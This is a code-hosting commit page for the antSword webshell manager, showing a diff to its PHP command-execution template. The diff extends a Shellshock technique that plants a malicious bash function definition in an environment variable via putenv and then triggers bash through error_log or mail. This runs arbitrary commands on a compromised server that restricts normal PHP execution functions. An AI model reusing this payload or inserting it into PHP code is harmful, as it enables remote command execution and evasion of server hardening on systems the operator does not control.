Skip to content

A
antSword
Commit e46122cc authored by Medicean's avatar Medicean
Browse files
Options

(Enhance:Terminal) PHP 利用 shellshock 时如果没有 mail 函数, 尝试使用error_log

parent a39fd919
Show whitespace changes
Inline Side-by-side
Showing with 6 additions and 2 deletions
source/core/php/template/command.js
View file @ e46122cc
...@@ -49,11 +49,15 @@ module.exports = (arg1, arg2) => ({ ...@@ -49,11 +49,15 @@ module.exports = (arg1, arg2) => ({
@proc_close($p); @proc_close($p);
}elseif(fe('antsystem')){ }elseif(fe('antsystem')){
@antsystem($c); @antsystem($c);
}elseif(substr($d,0,1)=="/" && fe('mail') && fe('putenv')){ }elseif(substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if(strstr(readlink("/bin/sh"),"bash")!=FALSE){ if(strstr(readlink("/bin/sh"),"bash")!=FALSE){
$tmp=tempnam(sys_get_temp_dir(), 'as'); $tmp=tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1"); putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
mail("a@127.0.0.1", "", "", "", "-bv"); if (fe('error_log')) {
error_log("a", 1);
}else{
mail("a@127.0.0.1", "", "", "-bv");
}
}else{ }else{
print("Not vuln (not bash)\n"); print("Not vuln (not bash)\n");
} }
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment